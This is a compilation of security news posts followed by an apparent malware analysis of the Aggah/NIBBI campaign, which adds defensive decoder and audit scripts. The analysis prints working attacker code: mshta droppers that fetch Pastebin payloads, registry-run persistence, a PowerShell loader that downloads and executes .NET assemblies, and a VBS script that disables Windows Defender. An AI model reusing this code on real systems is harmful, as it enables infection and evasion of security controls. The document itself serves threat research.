This vrun.bat file, shown below, will mount each shared drive, encrypt it, and then proceed to the next drive shared with the virtual machine.

Mounting all the shared drives to encrypt

As the security software running on the victim’s host will not detect the ransomware executable or activity on the virtual machine, it will happily keep running without detecting that the victim’s files are now being encrypted.

It should be noted that if the victim was running Windows 10’s Controlled Folder Access anti-ransomware feature, it may have been protected from an attack like this as the operating system would have detected writes to the protected folders.

When done, the victim will find a custom ransom note on their computer explaining how their company was breached, and their files were encrypted.

Custom Ragnar Locker ransom note (Source: Sophos)

The use of a virtual machine to encrypt a device’s files without being detected is an innovative approach.

As VirtualBox and a Windows XP virtual machine are not considered malicious, most security software will not be concerned that it is blissfully writing to all the data on the computer.

This attack illustrates how security software with behavioral monitoring is becoming more important to stem the tide of ransomware infections.

Only by detecting the unusual mass file writes would this attack be detected.

Pierluigi Paganini

(SecurityAffairs – Ragnar Locker ransomware, hacking)

The post Ragnar Ransomware encrypts files from virtual machines to evade detection appeared first on Security Affairs.

Maze ransomware operators leak credit card data from Costa Rica’s BCR bank

Maze ransomware operators published credit card details stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Maze ransomware operators have released credit card data stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

In early May, Maze ransomware operators claimed to have hacked the network of the state-owned Bank of Costa Rica (Banco BCR) and to have stolen internal data, including 11 million credit card credentials.

Banco BCR has equity of $806,606,710 and assets of $7,607,483,881, and is one of the most solid banks in Central America.

The hackers claim to have compromised Banco BCR’s network in August 2019 and to have had the opportunity to exfiltrate its information before encrypting the files.

Maze Ransomware crew

According to Maze, the bank’s network remained unsecured at least since February 2020.

However, the group explained that they did not encrypt the bank’s documents in February because doing so “was at least incorrect during the world pandemic”.

The stolen data includes 4 million unique credit card records, 140,000 of which allegedly belong to US citizens.

Now the Maze ransomware operators published a post on their leak site along with a spreadsheet (2GB in size) containing the payment card numbers from customers of Banco de Costa Rica (BCR).


The threat actors say they decided to leak the credit card numbers because of the lack of security measures implemented by the bank.

Security firm Cyble confirmed the data leak, which amounts to over 2GB of data.

“Just like previously, the Cyble Research Team has verified the data leak, which consists of a 2GB CSV file containing details of various Mastercard and Visa credit cards or debit cards.” reads the post published by Cyble. “As per Cyble’s researchers, the Maze ransomware operators have made this data leak due to the Banco de Costa not taking the previous leaks seriously. Along with that, the Maze ransomware operators have threatened the BCR about this type of leak going to happen every week.”

Maze ransomware operators published screenshots showing unencrypted Visa or MasterCard credit card numbers, all the cards have been issued by BCR.

The BCR bank has always denied that its systems were hacked by the Maze gang.

“After multiple analyses carried out by internal and external specialists in computer security, no evidence has been found to confirm that our systems have been violated. The permanent monitoring of our clients’ transactions confirms that none has been affected.” reads the latest statement published by the bank.

Pierluigi Paganini

(SecurityAffairs – BCR, hacking)

Coronavirus-themed attacks May 17 – May 23, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 17 to May 23, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide; experts are observing new campaigns on a daily basis.

Below a list of attacks detected this week.

May 19 – Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

May 22 – Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

May 23 – Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

If you are interested in COVID-19-themed attacks from February 1, take a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

Security Affairs newsletter Round 265

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Elexon, a middleman in the UK power grid network hit by cyber-attack
Experts reported the hack of several supercomputers across Europe
A bug in Edison Mail iOS app impacted over 6,400 users
FBI warns US organizations of ProLock ransomware decryptor not working
Mandrake, a highly sophisticated Android spyware used in targeted attacks
Stored XSS in WP Product Review Lite plugin allows for automated takeovers
Texas Department of Transportation (TxDOT) hit by a ransomware attack
129 million records of Russian car owners available on the dark web
Australian product steel producer BlueScope hit by cyberattack
Bluetooth BIAS attack threatens billions of devices
Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways
Easyjet hacked: 9 million customers’ data exposed along with 2,200+ credit card details
Hackers Target Oil Producers During COVID-19 Slump
Adobe fixed several memory corruption issues in some of its products
Israel is suspected to be behind the cyberattack on Iranian port
Researchers disclose five Microsoft Windows zero-days
Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials
Three flaws in Nitro Pro PDF reader expose businesses to hack
VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director
Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia
Japan suspects HGV missile data leak in Mitsubishi security breach
Meal delivery service Home Chef discloses data breach
Santander, one of the biggest European banks, was leaking sensitive data on their website
Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware
Tens of thousands of Israeli websites defaced
Cyber-Criminal espionage Operation insists on Italian Manufacturing
Experts found a Privilege escalation issue in Docker Desktop for Windows
Microsoft warns of massive campaign using COVID-19 themed emails
Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry
Experts observed a spike in COVID-19 related malspam emails containing GuLoader
Silent Night Zeus botnet available for sale in underground forums
The Florida Unemployment System suffered a data breach
Voter information for 2 million Indonesians leaked online

Pierluigi Paganini

(SecurityAffairs – newsletter)

Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

Researchers from Vipre Labs observed a spike in the use of GuLoader in COVID-19-themed campaigns since March 2020.


The discovery confirms that crooks continue to use COVID-19 lures in malspam campaigns. In the campaign monitored by Vipre Labs, attackers used spam email samples containing GuLoader.

GuLoader is a popular RAT that appeared in the threat landscape in 2019 and was involved in other COVID-19 campaigns; it is written in VB5/6 and compressed in a .rar/.iso file.

GuLoader is usually employed in spam campaigns using bill payments, wire transfers or COVID lures.

In the last campaign observed by experts, the downloader utilizes cloud hosting services to keep the payload encrypted.

“This malware downloader utilizes cloud hosting services like Microsoft OneDrive or Google Drive to keep its payload encrypted. Also, GuLoader is used to download Remote Access Trojan (RAT) or files that allow attackers to control, monitor, or steal information on the infected machine.” reads the analysis.

The malware implements anti-analysis techniques, such as an anti-debugger. In order to achieve persistence, GuLoader creates a folder in which to place a copy of itself and modifies a registry key.

The loader now implements process hollowing and uses the child processes to download, decrypt, and map the payload into memory.

Common payloads downloaded by the loader are Formbook, NetWire, Remcos, Lokibot, and others.

The analysis published by Vipre Labs includes technical details about the threats, including Indicators of Compromise (IoCs).

In early March, experts at MalwareHunterTeam uncovered a COVID-19-themed campaign that was distributing the GuLoader malware to deliver the FormBook information-stealing Trojan.

The campaign was using emails that pretend to be sent by members of the World Health Organization (WHO).

Pierluigi Paganini

(SecurityAffairs – COVID-19, malspam)

Silent Night Zeus botnet available for sale in underground forums

Experts reported the existence of a botnet, tracked as Silent Night and based on the Zeus banking Trojan, that is available for sale in several underground forums.

This week researchers from Malwarebytes and HYAS published a report that includes technical details on a recently discovered botnet, tracked as Silent Night, being distributed via the RIG exploit kit and COVID-19 malspam campaigns.

Silent Night

The source code of the Zeus Trojan has been available in the cybercrime underground since 2011, allowing crooks to develop their own releases ever since.

Experts found multiple variants in the wild, many of them belonging to the Terdot Zbot/Zloader malware family.

The name “Silent Night” Zbot is likely a reference to a weapon mentioned in the 2002 movie xXx. The malware was first spotted in November 2019, when a seller named “Axe” started offering it on the Russian underground forum forum.exploit[.]in.

Axe advertised the Trojan as the result of over five years of work, with roughly 15k hours spent developing the malicious code.

“The author described it as a banking Trojan designed with compatibility with Zeus webinjects. Yet, he claims that the code is designed all by him, based on his multiple years of experience – quote: “In general, it took me 5+ years to develop and support the bot, on average about 15k ~ hours were spent.”.” reads the report published by the researchers.

The botnet goes for $4,000 per month for a custom build and $2,000 per month for a general build, while HVNC functionality is available as an extra for 1,000 USD per month and a 14-day test of the code costs 500 USD.

Experts believe that Axe is also the developer of Axe Bot 1.4.1: comparing the Axe Bot 1.4.1 and Zloader 1.8.0 C2 source code, they noted that all of the custom PHP functions have the prefix CSR, which can be either a namespace or a developer’s handle.

Silent Night is able to grab information from online forms and perform web injections in major browsers, including Google Chrome, Mozilla Firefox, and Internet Explorer, as well as monitor keystrokes, take screenshots, and harvest cookies and passwords.

Silent Night leverages web injections to hijack a user’s session and redirect them to malicious domains or to grab the login credentials for online banking services. Data collected by the malware are then transferred to the operator’s command-and-control (C2) server.

The malware is able to infect all operating systems.

The seller also claims to use an original obfuscator, with decryption performed only “on demand.” The analysis of the content of an open directory on the command and control server allowed the researchers to discover a manual for bot operators that includes instructions for setting up the malware.

On December 23, 2019, this variant of Zloader was observed being distributed by the RIG Exploit Kit in small campaigns, likely for testing purposes. The spreading intensified over time: in March 2020, it was delivered in a COVID-19-themed spam campaign using weaponized Word documents.

“The design of Silent Night is consistent and clean, the author’s experience shows throughout the code. Yet, apart from the custom obfuscator, there is not much novelty in this product. The Silent Night is not any game changer, but just yet another banking Trojan based on Zeus.” concludes the report. “Based on the analysis of the bot’s configurations, we may confidently say that there is more than one customer of the “Silent Night”.”

Pierluigi Paganini

(SecurityAffairs – Silent Night, hacking)

Cyber-Criminal espionage Operation insists on Italian Manufacturing

ZLab researchers spotted a new malicious espionage activity targeting Italian companies operating worldwide in the manufacturing sector.


During our Cyber Threat Intelligence monitoring we spotted new malicious activities targeting some Italian companies operating worldwide in the manufacturing sector, some of them also part of the automotive production chain.

The group behind this activity is the same we identified in the past malicious operations described in Roma225 (12/2018), Hagga (08/2019), Mana (09/2019), and YAKKA (01/2020). This actor was first spotted by Palo Alto Networks’ Unit 42 in 2018 during wide-scale operations against technology, retail, manufacturing, and local government industries in the US, Europe and Asia. They also hypothesized possible overlaps with the Gorgon APT group, but no clear evidence confirmed that.

However, in order to keep track of all our reports, we summarized all the monitored campaigns, with their TTPs and final payloads:

Table 1: Synthetic table of the campaigns

As we can see from the table, the Aggah campaigns varied over time but kept some common points. All campaigns used as the initial stage an Office document (PowerPoint or Excel) armed with a macro, and some of them used injection methods.

All attack operations used a “Signed Binary Proxy Execution” technique abusing Mshta, a legitimate Microsoft tool, and used at least one executable file for the infection. In addition, a PowerShell stage or the abuse of a legitimate web service has been reported in some campaigns.

Furthermore, the CMSTP bypass is a new feature present only in the 2020 campaigns: the first malware identified exploiting this technique dates back to mid/late 2019, which suggests the threat actor likes to test the latest disclosed techniques in order to keep its campaigns at the forefront. Regarding persistence mechanisms, scheduled tasks were used initially, but the latest infections use registry run keys. All threats use at least one obfuscation method to make analysis harder.

Looking at the evolution of the final payloads, this evolution is certainly due to a chronological factor, since Revenge RAT had become obsolete, but it is also due to a technological factor and its means: Revenge RAT has the classic functionality of spyware, while AZORult is considered an info stealer. The last payload, Agent Tesla, combines the functionality of the previous payloads, as it is considered both an info stealer and spyware.

Technical Analysis

The infection chain starts with a malicious Microsoft PowerPoint document weaponized with a malicious macro.

Threat: Malicious macro
Brief Description: Malicious ppt dropper with macro.

Table 2. Sample information

The macro is short and quite easy to read:

Figure 1: Content of the malicious macro

The VBA macro is responsible for downloading and executing malicious code retrieved from Pastebin. j[.]mp is a URL shortening service; the following request redirects to and downloads a Pastebin paste:

Figure 2: Shortener resolution

The MSHTA Drop Chain

Like the previous campaigns, this threat actor uses a Signed Binary Proxy Execution (ID: T1218) technique abusing “mshta.exe” (T1170), a signed and legitimate Microsoft tool. Adversaries can use mshta.exe to proxy the execution of malicious .hta files, JavaScript or VBScript.

Figure 3: Piece of code of the Bnv7ruYp paste

As shown in the above figure, the code is simply URI-encoded: each instance of certain characters is replaced by one, two or three escape sequences representing the UTF-8 encoding of the character.

<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">
'id1
CreateObject("WScript.Shell").Run """mshta""""http:\\\raw\5CzmZ5NS"""
CreateObject("WScript.Shell").Run StrReverse("/ 08 om/ ETUNIM cs/ etaerc/ sksathcs") + "tn ""Pornhubs"" /tr ""\""mshta\""http:\\\raw\5CzmZ5NS"" /F ",0
'id2
CreateObject("WScript.Shell").RegWrite StrReverse("TRATS\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH"), """m" + "s" + "h" + "t" + "a""""http:\\\raw\sJEBiiMw""", "REG_SZ"
'id3
CreateObject("WScript.Shell").RegWrite StrReverse("\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH"), """m" + "s" + "h" + "t" + "a""""http:\\\raw\YL0je2fU""", "REG_SZ"

'defid
CreateObject("WScript.Shell").Run """mshta""""http:\\\raw\UyFaSxgj"""
CreateObject("WScript.Shell").RegWrite StrReverse("FED\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH"), """m" + "s" + "h" + "t" + "a""""http:\\\raw\UyFaSxgj""", "REG_SZ"


Code Snippet 1

This stage acts as a dropper: it downloads and executes some Pastebin contents through mshta.exe.

Figure 4: Evidence of the NIBBI author

This last campaign has been dubbed with the name of the Pastebin user spreading the malicious pastes, this time “NIBBI”. The first component is 5CzmZ5NS:

Figure 5: Piece of the code of 5CzmZ5NS paste

The second one is sJEBiiMw:

Figure 6: Piece of the code of the sJEBiiMw paste

The third one, YL0je2fU:

Figure 7: Piece of the code of the YL0je2fU paste

and the fourth component, UyFaSxgj:

Figure 8: Piece of the code of the UyFaSxgj paste

This obfuscation technique is typical of this particular actor, who has largely leveraged it in many malicious operations. Moreover, the usage of a legitimate website such as Pastebin (T1102) gives a significant amount of cover, with the advantage of very often being whitelisted. Using such a service reduces the C2 exposure. In the past, other groups such as APT41, FIN6 or FIN7 also used similar techniques to decouple attack infrastructure information from their implant configuration.

Once decoded, the first component (5CzmZ5NS) unveils some logic, as shown in Code Snippet 2. First of all, the script sets a registry key as a Windows persistence mechanism (T1060), in which it places the execution of the following command: “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).iamresearcher)|IEX

<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\bin", "mshta vbscript:Execute(""CreateObject(""""Wscript.Shell"""").Run """"powershell ((gp HKCU:\Software).iamresearcher)|IEX"""", 0 : window.close"")", "REG_SZ"
CreateObject("Wscript.Shell").regwrite "HKCU\Software\iamresearcher", "$fucksecurityresearchers='contactmeEX'.replace('contactme','I');sal M $fucksecurityresearchers;do {$ping = test-connection -comp -count 1 -Quiet} until ($ping);$iwannajoinuiwannaleavedsshit = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $iwannajoinuiwannaleavedsshit;$iwannaleftsellingtools= New-Object -Com Microsoft.XMLHTTP;$'GET','',$false);$iwannaleftsellingtools.send();$iwannaleftsellingtoolsy=$iwannaleftsellingtools.responseText;$asciiChars= $iwannaleftsellingtoolsy -split '-' |ForEach-Object {[char][byte]""0x$_""};$asciiString= $asciiChars -join ''|M;[Byte[]]$Cli2= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing('''').replace(''#'',''!#!@#'').replace(''!#!@#'',''0x'')')) | g;$iwannaleftsellingtools=[System.Reflection.Assembly]::Load($decompressedByteArray);[rOnAlDo]::ChRiS('InstallUtil.exe',$Cli2)" , "REG_SZ"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create( "powershell ((gp HKCU:\Software).iamresearcher)|IEX", null, objConfig, intProcessID)
'i am not a coder not a expert i am script kiddie expert i read code from samples on site then compile in my way
'i am not a coder 😉 i watch you on twitter every day thanks 🙂 i love my code reports!
'i am not a coder! bang 😉

Code Snippet 2

The code contains some “funny” comments related to the Twitter community of security researchers who constantly monitor the actor’s operations. Then, the final payload is identified by the Rk4engdU paste.

Figure 9: Piece of the rnS6CUz paste

Decoding this hex stream we get the following PowerShell code:

function UNpaC0k3333300001147555 {
    [CmdletBinding()]
    Param ([byte[]] $byteArray)
    Process {
        Write-Verbose "Get-DecompressedByteArray"
        $input = New-Object System.IO.MemoryStream( , $byteArray )
        $output = New-Object System.IO.MemoryStream
        $01774000 = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
        $puffpass = New-Object byte[](1024)
        while($true){
            $read = $01774000.Read($puffpass, 0, 1024)
            if ($read -le 0){break}
            $output.Write($puffpass, 0, $read)
        }
        [byte[]] $bout333 = $output.ToArray()
        Write-Output $bout333
    }
}
$t0='DEX'.replace('D','I');sal g $t0;[Byte[]]$MNB=('OBFUSCATED PAYLOAD ONE'.replace('@!','0x'))| g;
[Byte[]]$blindB=('OBFUSCATED PAYLOAD TWO'.replace('@!','0x'))| g
[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB
[byte[]]$decompressedByteArray = UNpaC0k3333300001147555  $MNB

Code Snippet 3 

The Powershell Loader

Code Snippet 3 is a PowerShell script in which the function “UNpaC0k3333300001147555” is declared; its purpose is to gzip-decompress the two payloads. Both of them are .NET binaries. The de-obfuscated code is stored in the deblindB variable and then executed.

As suggested by the name, deblindB invokes the static method “Bypass” of the “Amsi” class.

Figure 10: Amsi Bypass exploit evidence

Instead, the payload embedded inside the variable $MNB is another type of injection tool, but this one is not executed by the script, probably because both binaries perform the same action and only one is sufficient.

At this point, we dig into the “sJEBiiMw” component, obtaining:

<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create( "powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/ygwLUS9C'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)", null, objConfig, intProcessID)

Code Snippet 4

This script downloads and executes another script from Pastebin: ygwLUS9C. It is a base64-encoded script with some basic string replacing. We also noticed that this executable uses the CMSTP bypass technique (T1191), already seen in our previous report.
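The obfuscation layers met so far are all cheap to undo once named, and an analyst triaging this actor's pastes needs exactly these decoders at hand. The following Python is an added example, not ZLab's tooling: one function per layer seen in Code Snippets 1 to 4 and in the decimal `$cici` array of the VBS script later in the report (numeric character references in the `language` attribute, `StrReverse` literals, `@!`-prefixed and `-`-separated hex, decimal char arrays, the gzip stage, and the reversed base64 with `.` standing in for `0`). The two StrReverse literals and the first 28 numbers of the `$cici` array are copied from the snippets above; the gzip and base64 sample inputs are constructed stand-ins, not real payloads.

```python
"""Decoders for the obfuscation layers used across the NIBBI pastes (added example, not ZLab's tooling)."""
import base64
import gzip
import html
import re


def decode_html_entities(s):
    """Layer 1: the `<script language="&#86;&#66;...">` attribute is plain numeric character references."""
    return html.unescape(s)


def unreverse_literals(script):
    """Layer 2: the plain value of every StrReverse("...") literal in a VBScript snippet (Code Snippet 1)."""
    return [m[::-1] for m in re.findall(r'StrReverse\("([^"]*)"\)', script)]


def decode_prefixed_hex(blob, prefix="@!"):
    """Layer 3a: bytes written as '@!4D,@!5A,...'; the sample rewrites '@!' to '0x' and pipes it to iex."""
    pattern = re.escape(prefix) + r"([0-9A-Fa-f]{1,2})"
    return bytes(int(h, 16) for h in re.findall(pattern, blob))


def decode_dash_hex(blob):
    """Layer 3b: '4D-5A-90' pairs split on '-' and cast with [char][byte]"0x$_" (Code Snippet 2)."""
    return bytes(int(h, 16) for h in blob.split("-") if h)


def decode_decimal_array(text):
    """Layer 4: PowerShell @(36,117,...) decimal arrays fed to [Text.Encoding]::ASCII.GetString ($cici)."""
    return bytes(int(n) for n in re.findall(r"\d+", text)).decode("ascii")


def decode_stage(blob, prefix="@!"):
    """Layers 3a + 5: prefixed hex followed by the GzipStream loop of Code Snippet 3, as one call."""
    return gzip.decompress(decode_prefixed_hex(blob, prefix))


def decode_reversed_base64(s):
    """Layer 6: Code Snippet 4 restores '0' from '.', reverses the text, then base64-decodes it."""
    return base64.b64decode(s.replace(".", "0")[::-1])


# --- inputs ------------------------------------------------------------------
# Two StrReverse literals copied from Code Snippet 1 (quotes normalised to ASCII).
SNIPPET_1 = (
    r'CreateObject("WScript.Shell").Run StrReverse("/ 08 om/ ETUNIM cs/ etaerc/ sksathcs")' "\n"
    r'CreateObject("WScript.Shell").RegWrite StrReverse("TRATS\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH")'
)
# The first 28 numbers of the $cici array in the VBS script.
CICI_PREFIX = "@(36,117,115,101,114,80,97,116,104,32,61,32,36,101,110,118,58,85,83,69,82,80,82,79,70,73,76,69)"


def build_sample_stage():
    """Constructed stand-in for 'OBFUSCATED PAYLOAD TWO': a marker string gzipped, then written in '@!XX,' notation."""
    plaintext = b"constructed stage marker - not a real payload"
    blob = ",".join("@!%02X" % b for b in gzip.compress(plaintext))
    return blob, plaintext


def build_sample_reversed_b64():
    """Constructed stand-in for the ygwLUS9C paste: base64, reversed, with every '0' swapped for '.'."""
    plaintext = b"constructed assembly marker"
    encoded = base64.b64encode(plaintext).decode()[::-1].replace("0", ".")
    return encoded, plaintext


def stage_roundtrip_ok():
    blob, expected = build_sample_stage()
    return decode_stage(blob) == expected


def reversed_b64_roundtrip_ok():
    encoded, expected = build_sample_reversed_b64()
    return decode_reversed_base64(encoded) == expected


if __name__ == "__main__":
    print(decode_html_entities("&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;"))
    for literal in unreverse_literals(SNIPPET_1):
        print(literal)
    print(decode_decimal_array(CICI_PREFIX))
```

Run stand-alone it prints `VBScript`, the `schtasks /create /sc MINUTE /mo 80 /` command and the `HKCU\...\Run\START` key from Code Snippet 1, and `$userPath = $env:USERPROFILE`, the first line of the `$cici` script. Those recovered strings (the scheduled-task command line, the Run key value names, the `Set-MpPreference` calls) are the useful detection content; the encoding itself is only a speed bump.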

Figure 11: CMSTP Bypass evidence

However, in this case there is a new element compared to the previous version: through the CMSTP bypass, a VBS script is written in the “\%TEMP%\” folder, which executes many disruptive commands:

Figure 12: Evidence of the VBS script loaded and executed
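The settings this VBS script changes are the ones a defender should be checking for drift, so here is an added example (not code from ZLab or the original post) that audits a host configuration snapshot for them: the Windows Defender policy keys, the `Set-MpPreference` values, `EnableLUA` and the Office macro/Protected View keys the script writes. The snapshot format, a dict of registry path to value plus a dict of preference name to value, and the sample values are constructed; on a real host the dicts would be filled from a registry export and `Get-MpPreference` output.

```python
"""Audit a configuration snapshot for the security-disabling changes the Aggah VBS script makes
(added example; the snapshot is constructed, not real telemetry)."""
import re

# Registry values that indicate tampering (key -> value an attacker would set).
# For the Defender policy keys the disabling value is 1; note the sample writes 0 to those
# four, which leaves them effectively unchanged. EnableLUA 0 switches UAC prompts off.
REGISTRY_TAMPER_VALUES = {
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware": 1,
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring": 1,
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection": 1,
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable": 1,
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA": 0,
}

# Office keys the script sets to 1 for every version/application pair:
# VBAWarnings 1 = "enable all macros"; the ProtectedView Disable*InPV values 1 = Protected View off.
# ("Attachements" is the spelling of the real value name, as used by the script.)
OFFICE_KEY_RE = re.compile(
    r"^HKCU\\Software\\Microsoft\\Office\\(\d+\.\d+)\\(Word|Excel|PowerPoint)\\Security\\"
    r"(VBAWarnings|ProtectedView\\Disable(?:InternetFiles|Attachements|UnsafeLocations)InPV)$"
)

# Set-MpPreference settings the script changes, with the weakened value it sets.
MPPREFERENCE_TAMPER_VALUES = {
    "DisableRealtimeMonitoring": True,
    "DisableBehaviorMonitoring": True,
    "DisableBlockAtFirstSeen": True,
    "DisableIOAVProtection": True,
    "DisableScriptScanning": True,
    "SubmitSamplesConsent": 2,        # 2 = never send samples
    "MAPSReporting": 0,               # 0 = cloud-delivered protection off
    "HighThreatDefaultAction": 6,     # 6 = Allow
    "ModerateThreatDefaultAction": 6,
    "LowThreatDefaultAction": 6,
    "SevereThreatDefaultAction": 6,
}


def audit_registry(registry):
    """registry: {key_path: value}. Returns the sorted list of keys holding a tampered value."""
    findings = []
    for key, value in registry.items():
        if key in REGISTRY_TAMPER_VALUES and value == REGISTRY_TAMPER_VALUES[key]:
            findings.append(key)
        elif OFFICE_KEY_RE.match(key) and value == 1:
            findings.append(key)
    return sorted(findings)


def audit_mppreference(prefs):
    """prefs: {name: value} as Get-MpPreference reports them. Returns the sorted list of weakened names."""
    return sorted(name for name, bad in MPPREFERENCE_TAMPER_VALUES.items() if prefs.get(name) == bad)


def build_sample_snapshot():
    """Constructed snapshot of a host after the VBS ran (not real telemetry)."""
    registry = {
        r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware": 0,  # the script's no-op write
        r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA": 0,
        r"HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings": 1,
        r"HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV": 1,
        r"HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings": 2,  # still "disable with notification"
    }
    prefs = {
        "DisableRealtimeMonitoring": True,
        "DisableBehaviorMonitoring": False,
        "MAPSReporting": 0,
        "HighThreatDefaultAction": 6,
        "SubmitSamplesConsent": 1,
    }
    return registry, prefs


def sample_findings():
    registry, prefs = build_sample_snapshot()
    return audit_registry(registry), audit_mppreference(prefs)


if __name__ == "__main__":
    reg_findings, pref_findings = sample_findings()
    for key in reg_findings:
        print("tampered registry value:", key)
    for name in pref_findings:
        print("weakened Defender preference:", name)
```

Each finding maps directly to one line of the VBS script, which makes the audit output a usable artefact for both incident scoping (which controls were actually turned off) and restoration (which ones to set back).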

The VBS script, as its first-line comment also states, has the objective of setting the security level of the infected machine to zero. The script is the following:

'this script will put system on 0 security
If Not WScript.Arguments.Named.Exists("elevate") Then
  CreateObject("Shell.Application").ShellExecute WScript.FullName _
    , """" & WScript.ScriptFullName & """ /elevate", "", "runas", 1
  WScript.Quit
End If
On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware","0","REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring","0","REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection","0","REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable","0","REG_DWORD"
WScript.Sleep 100
outputMessage("Set-MpPreference -DisableRealtimeMonitoring $true")
outputMessage("Set-MpPreference -DisableBehaviorMonitoring $true")
outputMessage("Set-MpPreference -DisableBlockAtFirstSeen $true")
outputMessage("Set-MpPreference -DisableIOAVProtection $true")
outputMessage("Set-MpPreference -DisableScriptScanning $true")
outputMessage("Set-MpPreference -SubmitSamplesConsent 2")
outputMessage("Set-MpPreference -MAPSReporting 0")
outputMessage("Set-MpPreference -HighThreatDefaultAction 6 -Force")
outputMessage("Set-MpPreference -ModerateThreatDefaultAction 6")
outputMessage("Set-MpPreference -LowThreatDefaultAction 6")
outputMessage("Set-MpPreference -SevereThreatDefaultAction 6")

Sub outputMessage(byval args)
On Error Resume Next
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create( "powershell " + args, null, objConfig, intProcessID)

